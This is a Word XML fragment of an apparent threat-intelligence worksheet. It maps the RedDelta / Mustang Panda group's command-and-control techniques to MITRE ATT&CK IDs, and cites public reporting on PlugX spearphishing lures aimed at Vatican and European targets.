      <w:tr w:rsidR="002032E0" w:rsidRPr="00ED5880" w14:paraId="1845F3C2" w14:textId="77777777" w:rsidTr="00432976">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45A9A9C8" w14:textId="6FFB5865" w:rsidR="002032E0" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18E3437D" w14:textId="77777777" w:rsidR="002032E0" w:rsidRDefault="002032E0"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&amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61A0CB94" w14:textId="77777777" w:rsidR="002032E0" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C583E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1573.001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001C583E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Encrypted Channel: Symmetric Cryptography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70AEDD4E" w14:textId="53A33AAB" w:rsidR="002032E0" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F6CF2CB" w14:textId="77777777" w:rsidR="002032E0" w:rsidRPr="00F808AD" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11AB4086" w14:textId="77777777" w:rsidR="002032E0" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71D70202" w14:textId="2E5F4422" w:rsidR="002032E0" w:rsidRPr="00992EC7" w:rsidRDefault="00992EC7" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00992EC7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="607502CE" w14:textId="77777777" w:rsidR="002032E0" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>RedDelta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> uses RC4 encryption</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03F99140" w14:textId="77777777" w:rsidR="002032E0" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002032E0" w:rsidRPr="00ED5880" w14:paraId="04A7B582" w14:textId="77777777" w:rsidTr="00432976">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EA51319" w14:textId="41262A04" w:rsidR="002032E0" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DDA73B6" w14:textId="77777777" w:rsidR="002032E0" w:rsidRDefault="002032E0" w:rsidP="0043297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&amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3095C77D" w14:textId="77777777" w:rsidR="002032E0" w:rsidRPr="001C583E" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">T1071.001 </w:t>
            </w:r>
            <w:r w:rsidRPr="007367C1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Application Layer Protocol: Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D12CCFD" w14:textId="0D6E2EDE" w:rsidR="002032E0" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="008D1F8F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="554F0A28" w14:textId="77777777" w:rsidR="002032E0" w:rsidRPr="00F808AD" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5445914C" w14:textId="77777777" w:rsidR="002032E0" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BE3F89D" w14:textId="17C59542" w:rsidR="002032E0" w:rsidRPr="00F808AD" w:rsidRDefault="00992EC7" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00992EC7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43C55702" w14:textId="77777777" w:rsidR="002032E0" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>RedDelta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> uses HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002032E0" w:rsidRPr="00ED5880" w14:paraId="1848D974" w14:textId="77777777" w:rsidTr="00432976">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E60191A" w14:textId="77777777" w:rsidR="002032E0" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37AFCAD8" w14:textId="77777777" w:rsidR="002032E0" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E05967C" w14:textId="77777777" w:rsidR="002032E0" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="676B00F7" w14:textId="77777777" w:rsidR="002032E0" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F10EF8E" w14:textId="77777777" w:rsidR="002032E0" w:rsidRPr="00F808AD" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17C2DCAD" w14:textId="77777777" w:rsidR="002032E0" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29989444" w14:textId="77777777" w:rsidR="002032E0" w:rsidRPr="00F808AD" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D7CD01D" w14:textId="77777777" w:rsidR="002032E0" w:rsidRDefault="002032E0" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79FCB166" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="0077286F" w:rsidRDefault="00B14585" w:rsidP="00B14585"/>
    <w:p w14:paraId="6E2E9F19" w14:textId="4BF3D59F" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="00B14585">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId154" w:history="1">
        <w:r w:rsidR="003B449B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Chinese State-Sponsored Group '</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="003B449B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>RedDelta</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="003B449B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>' Targets the Vatican and Catholic Organizations (recordedfuture.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003B449B" w:rsidRPr="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[20</w:t>
      </w:r>
      <w:r w:rsidR="003B449B">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64571B1D" w14:textId="7D80E358" w:rsidR="00AD59B7" w:rsidRDefault="00AD59B7" w:rsidP="00B14585">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId155" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">TA416 Goes to Ground and Returns with a Golang </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>PlugX</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> Malware Loader | Proofpoint US</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2020]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549E9C75" w14:textId="6294A161" w:rsidR="00AD59B7" w:rsidRDefault="00AD59B7" w:rsidP="00B14585">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId156" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>An update on the threat landscape (</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:proofErr w:type="gramStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>blog.google</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:proofErr w:type="gramEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00361B1C">
        <w:t xml:space="preserve"> [2022]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFFFAD3" w14:textId="6F51D277" w:rsidR="00361B1C" w:rsidRDefault="00361B1C" w:rsidP="00B14585">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId157" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Chinese APT Bronze President Mounts Spy Campaign on Russian Military (darkreading.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2022] (via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>malpedia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3104128C" w14:textId="5D5528B6" w:rsidR="00E32331" w:rsidRDefault="00E32331" w:rsidP="00B14585">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:hyperlink r:id="rId158" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>PlugX</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> (Malware Family) (fraunhofer.de)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>malpedia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6AFC75A5" w14:textId="16899A48" w:rsidR="00CF2C56" w:rsidRDefault="00CF2C56" w:rsidP="00B14585"/>
    <w:p w14:paraId="585766A3" w14:textId="130D19C3" w:rsidR="00CF2C56" w:rsidRDefault="00CF2C56" w:rsidP="00CF2C56">
      <w:r>
        <w:t xml:space="preserve">[3] Mustang Panda or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Temp.Hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, a China-based threat actor, targeted European entities with lures related to the Ukrainian invasion. TAG identified malicious attachments with file names such as 'Situation at the EU borders with Ukraine.zip'. Contained within the zip file is an executable of the same name that is a basic downloader and when executed, downloads several additional files that load the final payload. To mitigate harm, TAG alerted relevant authorities of its findings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F0764D" w14:textId="78A20822" w:rsidR="00CF2C56" w:rsidRDefault="00CF2C56" w:rsidP="00CF2C56">
      <w:r>
        <w:t>Targeting of European organizations has represented a shift from Mustang Panda’s regularly observed Southeast Asian targets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1EE653" w14:textId="6B770698" w:rsidR="00CF2C56" w:rsidRDefault="00CF2C56" w:rsidP="00CF2C56"/>
    <w:p w14:paraId="5044EC94" w14:textId="53549ADE" w:rsidR="00CF2C56" w:rsidRDefault="00CF2C56" w:rsidP="002F0F45">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidR="002F0F45">
        <w:t xml:space="preserve">The lure document shown above, which has been previously reported on in relation to links to Hong Kong Catholic Church targeting, was used to deliver a customized </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F0F45">
        <w:t>PlugX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F0F45">
        <w:t xml:space="preserve"> payload that communicated with the C2 domain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F0F45">
        <w:t>systeminfor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F0F45">
        <w:t xml:space="preserve">[.]com. The document purported to be an official Vatican letter addressed to the current head of the Hong Kong Study Mission to China. It is currently unclear whether the actors created the document themselves, or whether it is a legitimate document they were able to obtain and weaponize. Given that the letter was directly addressed to this individual, it is likely that he was the target of a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F0F45">
        <w:t>spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F0F45">
        <w:t xml:space="preserve"> attempt</w:t>
      </w:r>
      <w:r w:rsidR="00F46443">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F46443">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00F46443" w:rsidRPr="00F46443">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1566.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F46443" w:rsidRPr="00F46443">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F46443" w:rsidRPr="00F46443">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F46443" w:rsidRPr="00F46443">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
      <w:r w:rsidR="00F46443">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidR="002F0F45">
        <w:t xml:space="preserve">. Additionally, as this sample was compiled after signs of an intrusion within the Vatican network, it is also possible that the phishing lure was sent through a compromised Vatican account. This hypothesis is supported by the identification of communications between </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F0F45">
        <w:t>PlugX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F0F45">
        <w:t xml:space="preserve"> C2s and a Vatican mail server in the days surrounding the sample’s compilation date and its first submission to public malware repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AA8828" w14:textId="69520E01" w:rsidR="00810608" w:rsidRDefault="00810608" w:rsidP="00810608">
      <w:r>
        <w:t>[1] The predecessor to this role played a key part in the finalization of the 2018 provisional China-Vatican agreement, making his successor a valuable target for intelligence gathering ahead of the deal’s expiry and likely renewal in September 2020</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF01B9A" w14:textId="1E3290EE" w:rsidR="00F46443" w:rsidRDefault="00F46443" w:rsidP="00810608">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RedDelta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> used ZIP files containing legitimate executables masquerading as lure documents</w:t>
      </w:r>
      <w:r w:rsidR="00CC5907">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CC5907">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00CC5907" w:rsidRPr="00CC5907">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CC5907" w:rsidRPr="00CC5907">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1036 Masquerading</w:t>
      </w:r>
      <w:r w:rsidR="00CC5907">
        <w:t xml:space="preserve"> ) </w:t>
      </w:r>
      <w:r>
        <w:t>, a notable departure from Mustang Panda activity that has been publicly reported previously. This legitimate executable is used to load a malicious DLL also present within the ZIP file through DLL sideloading</w:t>
      </w:r>
      <w:r w:rsidR="00FD7ABE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FD7ABE">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00FD7ABE" w:rsidRPr="00FD7ABE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1574.002</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FD7ABE" w:rsidRPr="00FD7ABE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Hijack Execution Flow: DLL Side-Loading</w:t>
      </w:r>
      <w:r w:rsidR="00FD7ABE">
        <w:t xml:space="preserve"> ) </w:t>
      </w:r>
      <w:r>
        <w:t>, before the target is shown a decoy document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EEB61B" w14:textId="39724EDE" w:rsidR="006D06C1" w:rsidRDefault="006D06C1" w:rsidP="00810608">
      <w:r w:rsidRPr="006D06C1">
        <w:t>CVE-2016-3235</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a possibility here but no specific evidence found</w:t>
      </w:r>
    </w:p>
